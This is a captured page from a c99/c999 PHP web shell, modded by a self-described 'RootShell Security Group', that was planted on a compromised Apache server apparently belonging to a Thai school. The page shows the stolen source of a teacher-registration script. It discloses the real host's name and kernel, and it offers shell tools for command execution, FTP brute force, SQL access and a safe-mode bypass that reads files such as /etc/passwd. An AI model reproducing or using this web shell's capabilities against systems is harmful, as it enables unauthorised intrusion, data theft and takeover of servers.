!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/admin/   drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertHistory.php (10.69 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
 session_start();
if (session_is_registered("valid_user"))
 {
include("../include/FunctionDB.php");
include("../include/Function.php");
ConnectDB();
$Flag = true;
$First_name = htmlspecialchars(trim($_POST[First_name]));
$Teacher_name = htmlspecialchars(trim($_POST[Teacher_name]));
$Teacher_lastname = htmlspecialchars(trim($_POST[Teacher_lastname]));
$Address =  htmlspecialchars(trim($_POST[Address]));
$Skill =  htmlspecialchars(trim($_POST[Skill]));
$DateBirth = $_POST[mYear]."-".$_POST[mMonth]."-".$_POST[mDate];
$Type_degree1 =  htmlspecialchars(trim($_POST[Type_degree1]));
$Type_degree2 =  htmlspecialchars(trim($_POST[Type_degree2]));
$Type_degree3 =  htmlspecialchars(trim($_POST[Type_degree3]));
//$Teacher_id = $_POST[Id1]."-".$_POST[Id2]."-".$_POST[Id3]."-".$_POST[Id4];
$Teacher_id = $_POST[Username];
$Sex  =  htmlspecialchars(trim($_POST[Sex]));
$Nationality = htmlspecialchars(trim($_POST[Nationality]));
$Nation =  htmlspecialchars(trim($_POST[Nation]));
$Religion = htmlspecialchars(trim($_POST[Religion]));
$Citizen_id = htmlspecialchars(trim($_POST[Citizen_id]));
$Father_name = htmlspecialchars(trim($_POST[Father_name]));
$Mother_name = htmlspecialchars(trim($_POST[Mother_name]));
$Status =htmlspecialchars(trim($_POST[Status]));
$Status2 =htmlspecialchars(trim($_POST[Status2]));
$Status3 =htmlspecialchars(trim($_POST[Status3]));
$Soulmate = htmlspecialchars(trim($_POST[Soulmate]));
$Total_child = htmlspecialchars(trim($_POST[Total_child]));
$Type_Degree =  $_POST[Type_Degree];
$Degree_code = $_POST[Degree_code];
$Club_nid = $_POST[Club_nid];
$Skill = htmlspecialchars(trim($_POST[Skill]));
$Gover_id = $_POST[Gover_id]; 
$Forum_nid = $_POST[Club_nid];
$Year_gov = $_POST[Year_gov];   
$Year_coll = $_POST[Year_coll]; 
$Year_fac = $_POST[Year_fac]; 
$Gover_pos = $_POST[Gover_pos]; 
$Manage_pos = $_POST[Manage_pos]; 
$Faculty_code = $_POST[Faculty_code]; 
$Group = htmlspecialchars(trim($_POST[Group]));
$Username  = $_POST[Username]; 
$Password = $_POST[Password];

///////////////     Check Duplicate Teacher Id /////////////////////////////////////
/*echo " $Teacher_id <br>";
$sql3 = "Select * From teachertb Where Teacher_id='$Teacher_id'";
$result3 = mysql_query($sql3) or die("Error $result3".mysql_error());
$sum = mysql_num_rows($result3);
if ($sum>0)
{
$msg .="<li>รหัสอาจารย์ซ้ำ";
$button ="<input type=\"button\" value=\"Back to Edit\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}
//////////////////// check Status Personal Register
$sql2 ="Select * From accounttb Where Teacher_id = '$Teacher_id' ";
$result1 = mysql_query($sql2) or die("Error $result1 $sql2".mysql_error());
$row = mysql_num_rows($result1);
if ($row < 0)
{
$msg .="<li>Teacher id Incorrect";
$button ="<input type=\"button\" value=\"Back to Edit\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}*/
////////////////////////// check First name 
if ($First_name =="")
{
$msg .="<li>กรุณาระบุ คำนำหน้า";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}
///////////////////// check name
if ($Teacher_name =="")
{
$msg .="<li>กรุณาระบุ ชื่อ";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}
/////////////////// Check Lastname
if ($Teacher_lastname =="")
{
$msg .="<li>กรุณาระบุ นามสกุล";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}
////////////////////////
if ( ! CheckLenght( $Citizen_id,12 ) )
	{
		$msg .= "<li>รหัสบัตรประชาชนต้องมีตั้งแต่ 13 หลัก";
		$button = "<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold; color:#FFF; background-color:#036; border-style:outset; border-color:#69F; font-family: Tahoma;\">";
		$Flag = false;
	}
///////////////////////  Check Address
if ($Address=="")
{
$msg .="<li>กรุณาระบุ ภูมิลำเนา";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}
//////////////////////// Check User //////////////////////
if ($Password != $_POST[Password1])
{
$msg .="<li>กรุณายืนยัน รหัสผ่าน";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}
/////////////////////////////////////
if ( ! CheckLenght($Password,6))
	{
		$msg .= "<li>รหัสผ่านต้องมีตั้งแต่ 6-15 อักษร";
		$button = "<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold; color:#FFF; background-color:#036; border-style:outset; border-color:#69F; font-family: Tahoma;\">";
		$Flag = false;
	}
////////////////* ตรวจสอบว่า มีตัวอักษรอื่น ๆ นอกเนื่องจากตัวอักษรภาษาอังกฤษ และ ตัวเลขหรือไม่ */
if ( ! CheckEngNumAlpha($Password))
	{
		$msg .= "<li>รหัสผ่านต้องเป็นอักษรภาษาอังกฤษ หรือ ตัวเลข เท่านั้น";
		$button = "<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold; color:#FFF; background-color:#036; border-style:outset; border-color:#69F; font-family: Tahoma;\">";
		$Flag = false;
	}

//--------------Check Status to Insert Data-----------------------//
   if( $Flag)
	{
	  
	   $Path = "../personal_pic"; 
	if ( isset($Img1) )
	if (copy($Img1,"$Path/$Img1_name")) 
       {
		    unlink ($Img1);
            $Img1 = "$Path/$Img1_name";
	     }
		else
			echo"Can't Copy";
     $StatusId=1; 
	 $Priority = 2;
	 $permission =2;
	 $PasswordR = $Password;
	 $Password = md5($Password);
	   
	      InsertHistory ($collegeCode , $officerId1, $Acno , $Teacher_id ,$First_name, $Teacher_name ,$Teacher_lastname, $DateBirth, $Sex, $Nationality, $Nation, $Religion, $Citizen_id, $Father_name, $Mother_name, $StatusId, $Status,  $Status2, $Status3, $Soulmate, $Total_child, $Address , $districtId, $amphurId ,$provinceId, $conId, $Img1, $Type_Degree  ,$Degree_code ,$Degree_else, $Degree_His1, $Degree_His1_Major, $Degree_His1_Institute, $Degree_His1_End_Year, $Degree_His2, $Degree_His2_Major, $Degree_His2_Institute, $Degree_His2_End_Year ,$Degree_His3, $Degree_His3_Major, $Degree_His3_Institute, $Degree_His3_End_Year ,$Type_degree1 ,$Type_degree2 ,$Type_degree3 ,$Year_1, $Year_2,$Year_3 ,$Person_type,$Teacher_type,$Gover_id,$Forum_nid ,$Club_nid,$Club_no,$Year_gov ,$Year_coll ,$Year_fac,$Gover_pos,$PositionId, $Salary_1,$Salary_2,$Salary_3 ,$Date_gover ,$Absent_02, $Absent_03, $TeacherId, $Propessnal, $Absent_06, $Manage_pos ,$Faculty_code, $Dentis_code, $Email , $Username, $Password ,$Flag_del ,$permission );
	   
	   /*  
         InsertHistory($Teacher_id,$First_name,$Teacher_name,$Teacher_lastname,$DateBirth,$Sex, $Nationality,$Nation,$Religion,$Citizen_id,$Father_name,$Mother_name,$Status,$Status2,$Status3,$StatusId,$Soulmate,$Total_child,$Address,$districtId,$amphurId,$provinceId,$Img1,$Skill,$Type_Degree,$Degree_code,$Degree_else,$Degree_His1,$Degree_His1_Major,$Degree_His1_Institute,$Degree_His1_End_Year,$Degree_His2,$Degree_His2_Major,$Degree_His2_Institute,$Degree_His2_End_Year,$Degree_His3,$Degree_His3_Major,$Degree_His3_Institute,$Degree_His3_End_Year,$Type_degree1,$Salary_1, $Salary_2,$Salary_3,   $Type_degree2,$Type_degree3,$Year_1,$Year_2,$Year_3,$Person_type,$Teacher_type, $Gover_id,$Forum_nid,$Club_nid,$Year_gov,$Year_coll,$Year_fac,$Gover_pos, $Manage_pos, $Faculty_code,$Group,$Username,$Password,$Permission);
		 */
	
	$Teacher_code = mysql_insert_id();
 
	 $Flag = 1;
    InsertUser($Teacher_code,$Username,$Password,$PasswordR,$Priority,$Flag);
		  $msg.="<li>คุณ<b> $Teacher_name $Teacher_lastname</b>";
          $msg.="<li>ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว";
          $msg.="<li>ท่าน ควรยืนยันสิทธิการใช้งาน";
          $button = "<input type=\"reset\" value=\"Close Windows\" onclick=\"javascript:parent.close();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
	          echo "<meta http-equiv=\"refresh\" content=\"1;URL=AccessList.php\">";
		 ?>
		 <table width="69%" border="0" align="center" cellpadding="0" cellspacing="0">

</table>
	<?php
	}
	CloseDB();
?>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">

<link href="../css/style1.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0"marginwidth="0"marginheight="0">
<br>
  <table width="70%" border="0" cellspacing="0"cellpadding="2"align="center">
    <tr>
      <td><div align="center"><span><b><font color="#003399" size="4" face="Tahoma">::แบบฟอร์มกรอกข้อมูลประวัติ::</font></b></span></div></td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="1"cellpadding="0"align="center" class="table">
          <tr>
            
          <td bgcolor="#D7EBF4"><div align="center"><b><font color="#000000" size="2" face="Tahoma">ระบบแจ้งการทำงาน</font></b></div></td>
</tr>
<tr>
            <td bgcolor="#000000"> 
              <table width="90%" border="0" cellspacing="1"cellpadding="0"align="center">
              <tr>
<td><span><b><font color="#FFFFFF"><?php echo $msg;?></font></b></span></td>
</tr>
</table>
</td>
</tr>
<tr>
            
          <td bgcolor="#D7EBF4"> 
            <div align="center"><b><font color="#CCFF00"><?php echo $button;?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font size="2" face="Tahoma"></font></font></b></div></td>
</tr>
</table>
</td>
</tr>
</table>
  <br>

</body>
</html>
<?php 
	}
else
{
    echo"<body bgcolor=\"#CCCCCC\">";
	 echo"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";
     echo"<center>";
	  echo"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";
      echo"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";
	  echo"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> คุณไม่มีสิทธ์ใช้งาน</font>";
	  echo"</center>";
	  echo"</body>";
} 
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0052 ]--